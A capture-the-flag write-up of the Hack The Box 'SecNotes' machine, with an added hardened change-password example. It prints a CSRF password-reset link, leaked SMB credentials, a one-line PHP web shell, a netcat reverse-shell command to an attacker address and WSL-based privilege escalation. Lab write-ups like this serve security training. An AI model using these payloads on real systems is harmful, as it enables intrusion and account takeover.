Write-up: Hack The Box — SecNotes
Description
- Name: SecNotes
- IP: 10.10.10.97
- Author: 0xdf
- Difficulty: 5/10
Discovery
nmap -sV -sC -Pn -p- -T4 --min-rate 1000 --max-retries 5 10.10.10.97
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h20m06s, deviation: 4h02m30s, median: 5s
| smb-os-discovery:
| OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: SECNOTES
| NetBIOS computer name: SECNOTES\x00
| Workgroup: HTB\x00
|_ System time: 2018-08-28T02:44:42-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2018-08-28 11:44:43
|_ start_date: N/A
With dirsearch we found:
- 200 — /login.php
- 200 — /Login.php
- 500 — /auth.php
- 200 — /home.php -> /login.php
- 200 — /register.php
Pwn
Using nullinux we did not find any share accessible without credentials.
Before trying to brute-force or bypass the login with SQLi we registered a username to access the home page.
From the home page we saw that tyler is accountable for GDPR at secnotes.htb and that we can contact him via e-mail. From the home page we can choose between:
- submit_note: a POST request with `title=asd&noted=asd&Submit=Save` to insert a new note on your personal page; this functionality is vulnerable to XSS
- change_pass: a POST request with `password=newpass&confirm_password=newpass&submit=submit` (this request also works with GET)
- logout: a GET request to log out from the website
- contact: a POST request with `message=hello&submit=Send` to send a message to tyler@secnotes.htb
Through the contact form we can send a link and Tyler will open it (client-side attack).
While we were testing the site's functionality the nikto scan finished and showed that the application supports the GET, POST, TRACE, HEAD and OPTIONS methods.
At first we focused only on crafting a payload to get a shell through the e-mail form; but then (thanks to Nauten) we tried to use the change_pass feature with GET parameters:
curl -s -X GET "http://10.10.10.97/change_pass.php?password=dodopass&confirm_password=dodopass&submit=submit"
The password was indeed changed to dodopass, so we sent the same link to Tyler through the contact form: the request changes state, is accepted over GET and carries no anti-forgery token, so simply opening the link changes his password (CSRF).
We can now log in as tyler.
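For comparison, this is how a change_pass handler should look so that the link sent through the contact form is rejected; it is an added example, not part of the original write-up or of the box's code. It accepts only POST, requires a per-session CSRF token and the current password; the `$_SESSION['user_id']` key, `db.php` and the `users(id, password_hash)` table are assumptions.

```php
<?php
// Added example, not the SecNotes application's code: a change-password handler
// hardened against the change_pass weakness above. Assumptions: $_SESSION['user_id']
// holds the logged-in user's id and db.php (hypothetical) provides a PDO handle
// $pdo over a users(id, password_hash) table.
session_start();
require 'db.php';

function csrf_token(): string {
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32)); // 256-bit per-session token
    }
    return $_SESSION['csrf'];
}

function fail(int $status, string $msg): void {
    http_response_code($status);
    exit($msg);
}

if (!isset($_SESSION['user_id'])) {
    fail(401, 'login required');
}
// 1. State changes only over POST: a link opened from the contact form is a GET
//    and is refused outright, so visiting a URL can no longer change the password.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    fail(405, 'POST required');
}
// 2. Read $_POST only (never $_REQUEST, which also accepts query-string values)
//    and compare the CSRF token in constant time.
if (!hash_equals(csrf_token(), (string)($_POST['csrf'] ?? ''))) {
    fail(403, 'invalid CSRF token');
}
// 3. Re-authenticate: a forged or hijacked request still needs the current password.
$stmt = $pdo->prepare('SELECT password_hash FROM users WHERE id = ?');
$stmt->execute([$_SESSION['user_id']]);
$row = $stmt->fetch(PDO::FETCH_ASSOC);
if (!$row || !password_verify((string)($_POST['current_password'] ?? ''), $row['password_hash'])) {
    fail(403, 'current password incorrect');
}
$new = (string)($_POST['password'] ?? '');
if (strlen($new) < 12 || $new !== (string)($_POST['confirm_password'] ?? '')) {
    fail(400, 'passwords must match and be at least 12 characters');
}
$stmt = $pdo->prepare('UPDATE users SET password_hash = ? WHERE id = ?');
$stmt->execute([password_hash($new, PASSWORD_DEFAULT), $_SESSION['user_id']]);
session_regenerate_id(true); // rotate the session id after a credential change
echo 'password changed';
```

The form that posts to this handler must carry the token as a hidden field, e.g. `<input type="hidden" name="csrf" value="<?= csrf_token() ?>">`, and the contact form's links then fail with 405 before any parameter is read.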
From the home page we got a recipe, a list of years and the URL of an SMB share together with a username and password:
\\secnotes.htb\new-site
tyler / 92g!mA8BGjOirkL%OG*&
We can now connect to the new-site share.
Since we saw that iisstart.htm is present in the share and is the default page served by the web server on port 8808, we uploaded a simple PHP shell:
<?php
system($_GET["cmd"]);
We can now execute commands on the machine and maybe get the first flag!
Using the web shell we enumerated the users and read user.txt from Tyler's Desktop folder.
To upgrade the web shell to a reverse shell we could not use meterpreter, since an AV is active on this machine (Windows Defender alone is enough to block meterpreter stagers and connections), so we uploaded the portable version of Netcat through the share and then issued the command to connect back to our machine (to create a FUD EXE see the Rabbit write-up).
http "http://10.10.10.97:8808/dodo.php?cmd=nc.exe 10.10.XX.XX 3488 -e powershell.exe"
In the user's Desktop folder we also saw a shortcut to a bash PE at “C:\Windows\System32\bash.exe”, but no such executable was found in that directory. The “bash.exe” should be linked to a WSL (Windows Subsystem for Linux) installation on the machine, which could be used to gain SYSTEM privileges.
To search for a “bash.exe” executable we ran a find command in PowerShell:
Get-ChildItem -Path C:\Windows -Include bash.exe -File -Recurse -ErrorAction SilentlyContinue
After a long wait (dir /b /s bash.exe is probably faster) we found that “bash.exe” is located at:
C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe
After poking around we discovered that even though we are `root` inside WSL we cannot access the “Administrator” folder and thus cannot read the system flag.
So, using bash, we searched the classic locations where useful information is found on a Linux system, and in root's home directory we found the “Administrator” password for an SMB share in the “.bash_history” file.
Using smbclient we connected to the share and downloaded the root flag file.